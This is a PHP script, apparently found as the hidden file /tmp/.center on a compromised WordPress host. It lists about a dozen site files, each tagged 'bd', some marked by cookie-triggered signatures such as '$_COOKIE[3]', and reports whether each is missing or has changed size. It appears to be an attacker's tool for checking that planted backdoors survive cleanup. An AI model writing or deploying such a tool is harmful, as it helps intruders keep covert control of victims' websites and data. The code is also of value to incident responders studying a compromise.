File: //tmp/.center
<?php $r = '/home/bredicio/public_html'; $x = ["/wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php"=>"bd@@79820@@$_COOKIE[-",
"/wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php"=>"bd@@79234@@72",
"/wp-includes~/js/dist/script-modules/interactivity/interactivity/index.php"=>"bd@@73250@@66",
"/wp-admin/maint/maint/maint/index.php"=>"bd@@83309@@5",
"/wp-load.php"=>"bd@@83601@@21",
"/wp-admin/options-permalink.php"=>"bd@@83604@@91",
"/wp-includes/block-supports/border.php"=>"bd@@83607@@_COOKIE[3]",
"/wp-includes/class-wp-metadata-lazyloader.php"=>"bd@@83915@@_COOKIE[3]",
"/wp-admin/link-parse-opml.php"=>"bd@@83306@@_COOKIE[3]",
"/wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php"=>"bd@@41267@@93",
"/wp-includes/blocks/loginout.php"=>"bd@@50299@@_COOKIE[3]",
"/wp-content/mu-plugins/elementor.safe.mode.php"=>"bd@@83627@@474",
"/wp-content/plugins/contact-form-7/modules/file.php"=>"bd@@83914@@Clear-Site-Data",
"/wp-includes~/blocks/categories/categories/cache.php"=>"bd@@78542@@_COOKIE[3]"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');